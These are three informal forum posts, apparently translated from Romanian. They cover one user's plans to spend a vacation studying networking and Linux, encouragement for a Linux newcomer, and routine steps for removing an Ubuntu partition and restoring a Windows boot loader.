If I had 2 days of vacation it would be the greatest gift for me, because I would devour a few books on internetworking and routing; I'm sure I know these things well, but I don't think it hurts to learn them better (who knows what I missed, or maybe some chapter I didn't memorize well). I would also read something about Linux system administration and the Linux kernel, because I've read a great deal about them, but the more I read the more I feel like a beginner. I would pay to have at least 2-3 days of vacation to be able to study, because I have many PDFs on my PC, many of which I've printed out on paper, but they haven't had the chance to be read.

With every passing day new vulnerabilities appear; it doesn't make me feel good, because I can't keep up with them and understand how everything works. One thing is certain: I won't play anything, because only children still play. I'll surely buy 2-3 books before I leave, or maybe not, because I've already bought too many and they sit on the bookshelf gathering dust. I'll take them and read them. When I return I'll surely make some tutorials for the others too.

I'll try to learn many things on my own without going back to the same Help section on the forum; I'll surely do that in my free time, on the vacation I can hardly wait for. And if I have a little free time left, I'll probably try to learn a foreign language, or for example a bit of Romanian grammar, because I've seen many mistakes of expression.

There are so many things I can't manage to understand and that nobody manages to explain to me; I'll have to study a lot, of course, and a vacation is the perfect, ideal place. I don't think I'll get bored; I won't have time for that, I certainly won't have any left. I'll probably get home with a few unread books, and I probably won't understand the While or For loop well enough, because I'm sure I know them but I still make mistakes.

That's it, so the question of what I'll do without the internet doesn't arise; only if someone thinks he knows very well how things work and is sure of it do I think he'll have time to do something else, or to play games like all children. I don't think boredom exists; there isn't enough time for everything there is to learn.
-
It would be good to learn the essential BASH commands (A-Z Command Index - Linux Commands in English | howto, examples); it's not hard! Make yourself a backup (believe me, you need it).

The first answer is that you don't need an antivirus, it is more secure than a Windows system, and it's free. It can be a firewall and a web server at the same time; you can chat, listen to music, play games, do graphics work and, of course, program.

I used to ask myself the same thing, where not to go so as not to break something, but I poked around everywhere because I was very curious how it works; that's why I said: make yourself a backup (believe me, you need it).

If you don't intend to explore the new system and you set yourself a limit, you'll get to know only a small part of this system called Linux. What happens is that many give up and go back to something that isn't free, has loads of viruses, and is called Windows. And Linux stays installed on a small piece of the hard disk and gets used once a month or maybe less often. Few are those who stay with this operating system.

So after you ask yourself a few questions and see how a few things work, you can make a decision; which one it will be depends only on you.
-
If you want to format it, you can go in Windows to Administrative Tools > Computer Management > Disk Management and delete the partition where Ubuntu is installed (this will erase the data on that partition). Don't forget that you'll have to reinstall a boot loader for Windows if you no longer want Linux, because you won't be able to start Windows after you delete Ubuntu, since they use the same boot loader, GRUB. Anyway, it's not a problem: you can reinstall the boot loader for Windows or install a new Ubuntu system in the space that's been left free.

Another option would be to make a Live CD with GParted, an open-source tool with which you can make any kind of partitions on a hard disk, format them with whatever filesystem you want, and create new partitions, all using a GUI; it shouldn't be hard.
GParted -- Download

After you download it you only have to burn the image to a CD and put it in the PC, then reboot, and you'll have everything you need to work on a hard disk. Be careful what you do, because it's delicate work; even the most expert make mistakes.

What you need to know is that you'll also delete the boot loader; in that case the computer will no longer be able to load Windows and you'll have to install a boot loader.
GNU GRUB - Wikipedia, the free encyclopedia
Booting - Wikipedia, the free encyclopedia